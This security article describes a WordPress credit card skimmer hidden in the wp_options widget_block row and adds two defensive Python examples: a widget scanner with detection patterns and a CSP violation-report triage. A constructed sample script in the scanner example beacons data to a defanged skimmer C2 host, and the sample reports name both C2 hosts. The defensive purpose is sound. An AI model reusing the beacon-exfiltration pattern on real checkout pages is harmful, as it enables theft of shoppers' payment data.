During an investigation of a compromised WordPress website, sophisticated credit card skimmer malware was discovered that stealthily injects malicious JavaScript into database entries, specifically targeting checkout pages.
The malicious script either hijacks existing payment fields or injects a fraudulent credit card form, enabling the theft of sensitive payment information from unsuspecting customers.
This stealthy operation makes it possible for the malware to remain undetected while simultaneously compromising the integrity of the website and putting the financial data of customers at risk.
The malware was discovered within the WordPress database, specifically within the `wp_options` table under the `widget_block` row that contained obfuscated JavaScript code.
By targeting the database, the malware evades detection by typical file-scanning methods, allowing it to persist undetected on compromised WordPress sites. The malicious JavaScript was injected into the HTML block widget through the WordPress admin panel, enabling its execution within the website’s frontend.
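Because the payload lives in the `widget_block` option rather than in a file, a file-integrity scanner never sees it; the `wp_options` row itself has to be audited. The following is an added example, not code from Sucuri or the report: a heuristic scanner that walks the PHP-serialized `widget_block` value, pulls each widget's `content` string by its declared byte length, and scores any inline `<script>` it finds against indicators of the behaviour described above (checkout-page targeting, Base64 decoding, `navigator.sendBeacon`). The indicator list, the threshold, and the sample option value (including the inert script that only imitates the skimmer's shape and beacons to a defanged hostname from the report) are constructed for this example.

```python
import re
from dataclasses import dataclass

# Inline <script> bodies inside a widget's block markup.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# Heuristic indicators; this list is constructed for the example and should be
# tuned per site. Each distinct hit is one point toward the finding's score.
INDICATORS = {
    "exfil_sendbeacon": re.compile(r"navigator\.sendBeacon", re.I),
    "decode_atob": re.compile(r"\batob\s*\(", re.I),
    "decode_fromcharcode": re.compile(r"String\.fromCharCode", re.I),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\(", re.I),
    "webcrypto_aes": re.compile(r"crypto\.subtle|AES-CBC", re.I),
    "checkout_targeting": re.compile(r"checkout|card[-_ ]?number|\bcvv\b|\bcvc\b|expir", re.I),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
}

# WordPress serializes each block widget instance as
#   i:<n>;a:<k>:{s:7:"content";s:<len>:"...";...}
INSTANCE_HEADER = re.compile(rb'i:(\d+);a:\d+:\{s:7:"content";s:(\d+):"')


@dataclass
class Finding:
    widget_index: int
    indicators: list
    script_bytes: int


def widget_contents(option_value: str):
    """Yield (widget_index, content) for every instance in a widget_block value.

    PHP's s:<len>:"..." prefix gives the exact byte length of each content
    string, so we slice by length instead of regex-matching the closing quote;
    a payload that contains '";' would otherwise truncate the scan.
    """
    data = option_value.encode("utf-8")
    for m in INSTANCE_HEADER.finditer(data):
        idx, length = int(m.group(1)), int(m.group(2))
        start = m.end()
        yield idx, data[start:start + length].decode("utf-8", errors="replace")


def scan_widget_block(option_value: str, min_score: int = 2) -> list:
    """Return a Finding for each widget whose inline scripts reach min_score."""
    findings = []
    for idx, content in widget_contents(option_value):
        hits = set()
        script_bytes = 0
        for m in SCRIPT_TAG.finditer(content):
            body = m.group(1)
            script_bytes += len(body.encode("utf-8"))
            hits.add("inline_script")  # any script in a widget is worth a point
            hits.update(name for name, pat in INDICATORS.items() if pat.search(body))
        if len(hits) >= min_score:
            findings.append(Finding(idx, sorted(hits), script_bytes))
    return findings


def php_serialize_widget_block(contents: dict) -> str:
    """Build a widget_block value in WordPress's layout (constructed helper for the sample)."""
    parts = []
    for idx, content in contents.items():
        parts.append(f'i:{idx};a:1:{{s:7:"content";s:{len(content.encode("utf-8"))}:"{content}";}}')
    parts.append('s:12:"_multiwidget";i:1;')
    return f"a:{len(contents) + 1}:{{{''.join(parts)}}}"


# Constructed sample: widget 2 is a benign promo block, widget 3 only imitates the
# skimmer's shape (checkout check, Base64 decode, beacon to a defanged C2 name
# from the report) and contains no actual skimming logic.
BENIGN = '<!-- wp:paragraph --><p>Free shipping on orders over $50.</p><!-- /wp:paragraph -->'
SUSPECT = ('<!-- wp:html --><script>var p=atob("QUJD");if(location.pathname.indexOf("checkout")>-1)'
           '{navigator.sendBeacon("https://valhafather[.]xyz/",p);}</script><!-- /wp:html -->')
SAMPLE_OPTION_VALUE = php_serialize_widget_block({2: BENIGN, 3: SUSPECT})

if __name__ == "__main__":
    for f in scan_widget_block(SAMPLE_OPTION_VALUE):
        print(f"widget_block[{f.widget_index}]: score={len(f.indicators)} "
              f"{f.indicators} ({f.script_bytes} bytes of script)")
```

In practice the option value comes from `SELECT option_value FROM wp_options WHERE option_name = 'widget_block'` (and, on older sites, `widget_custom_html`); the threshold of two indicators keeps a lone analytics snippet out of the alert list while a script that both decodes Base64 and calls `sendBeacon` is always reported.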
It injects a fake payment form or hijacks existing payment fields on the checkout page to steal credit card information, including credit card number, expiration date, CVV, and billing information.
Once the malware has captured the victim's payment data in the browser, it first Base64-encodes it to obscure the contents.
The encoded data is then encrypted with AES-CBC using a randomly generated initialization vector (IV), so the payload appears innocuous in transit and resists analysis.
The encrypted data is then exfiltrated to remote command-and-control (C2) servers, such as “valhafather[.]xyz” and “fqbe23[.]xyz,” using the navigator.sendBeacon function that ensures silent data transmission without disrupting the user experience.
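The exfiltration step is the one a site owner can actually observe: `navigator.sendBeacon` is governed by the `connect-src` directive of a Content Security Policy, so a policy that confines checkout-page connections to the site and its payment gateway, with `report-uri` set, turns every beacon to an unknown host into a violation report. The following is an added example, not code from the report, that triages such reports. The allowlist, the report-only policy string, and the sample report lines are constructed; the two C2 hostnames from the report appear in them undefanged because that is how a browser would report a blocked URI.

```python
import json
from collections import Counter
from urllib.parse import urlparse

# Hosts the checkout page is allowed to talk to. Constructed allowlist for the
# example; a real one is derived from the site's payment gateway and analytics.
ALLOWED_CONNECT_HOSTS = {"shop.example", "api.payments.example"}

# Constructed policy: confine beacons/fetch/XHR to the allowlist and report the
# rest. Deploy it as Content-Security-Policy-Report-Only first so a legitimate
# gateway call is never blocked unnoticed.
CSP_REPORT_ONLY = (
    "default-src 'self'; "
    "connect-src 'self' https://api.payments.example; "
    "report-uri /csp-report"
)


def parse_report(line: str) -> dict:
    """Extract the fields we need from one JSON-encoded CSP violation report."""
    body = json.loads(line).get("csp-report", {})
    return {
        "page": body.get("document-uri", ""),
        # Older browsers send only violated-directive, which may carry the whole
        # directive text ("connect-src 'self' https://..."); newer ones add
        # effective-directive with just the name.
        "directive": body.get("effective-directive") or body.get("violated-directive", ""),
        "blocked": body.get("blocked-uri", ""),
    }


def host_of(uri: str) -> str:
    """blocked-uri may be a full URL or just an origin; either way take the host."""
    return urlparse(uri).hostname or ""


def triage(lines, allowed=ALLOWED_CONNECT_HOSTS):
    """Return (alerts, summary).

    alerts: (host, page) pairs for connect-src violations raised on a checkout
    page toward a host outside the allowlist, i.e. the beacon pattern above.
    summary: counts of everything else so the noise is visible too.
    """
    alerts = []
    summary = Counter()
    for line in lines:
        try:
            r = parse_report(line)
        except (json.JSONDecodeError, AttributeError):
            summary["malformed"] += 1
            continue
        directive = r["directive"].split()[0] if r["directive"] else ""
        if directive != "connect-src":
            summary["other_directive"] += 1
            continue
        host = host_of(r["blocked"])
        if host in allowed:
            summary["allowlisted"] += 1
            continue
        on_checkout = "checkout" in urlparse(r["page"]).path.lower()
        if on_checkout:
            summary["checkout_exfil"] += 1
            alerts.append((host, r["page"]))
        else:
            summary["non_checkout"] += 1
    return alerts, summary


# Constructed sample reports, one JSON document per line as a report endpoint
# would log them.
SAMPLE_REPORTS = [
    json.dumps({"csp-report": {"document-uri": "https://shop.example/checkout/",
                               "violated-directive": "connect-src 'self' https://api.payments.example",
                               "blocked-uri": "https://valhafather.xyz/"}}),
    json.dumps({"csp-report": {"document-uri": "https://shop.example/checkout/",
                               "effective-directive": "connect-src",
                               "blocked-uri": "https://fqbe23.xyz/collect"}}),
    json.dumps({"csp-report": {"document-uri": "https://shop.example/checkout/",
                               "effective-directive": "connect-src",
                               "blocked-uri": "https://api.payments.example/v1/tokens"}}),
    json.dumps({"csp-report": {"document-uri": "https://shop.example/blog/",
                               "effective-directive": "img-src",
                               "blocked-uri": "https://cdn.example/x.png"}}),
    "not json",
]

if __name__ == "__main__":
    alerts, summary = triage(SAMPLE_REPORTS)
    for host, page in alerts:
        print(f"ALERT: {page} attempted a connection to {host}")
    print(dict(summary))
```

The allowlisted gateway call in the sample shows why the policy should start in report-only mode: the same triage that flags the two C2 hosts would also have revealed a legitimate endpoint missing from `connect-src` before enforcement broke checkout.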
According to Sucuri, this malware poses a significant threat by covertly exfiltrating sensitive payment data, such as credit card details, from unsuspecting online shoppers during checkout.
The malicious code, often concealed within inconspicuous Custom HTML widgets, operates discreetly in the background, intercepting and transmitting this critical information to threat actors.
Cybercriminals then use the stolen data for fraudulent transactions or sell it on illicit underground markets. What makes the skimmer particularly dangerous is that it harvests customer data without any noticeable disruption to the normal checkout process.
The credit card skimmer attack highlights the evolving threat landscape, where attackers exploit WordPress databases to inject malicious code into checkout processes. By leveraging outdated software and weak admin controls, attackers can silently steal payment data.
Mitigating these risks requires proactive measures such as regular software updates, robust password security, and the implementation of file integrity monitoring and web application firewalls that can enhance security posture by proactively identifying and preventing malicious activities.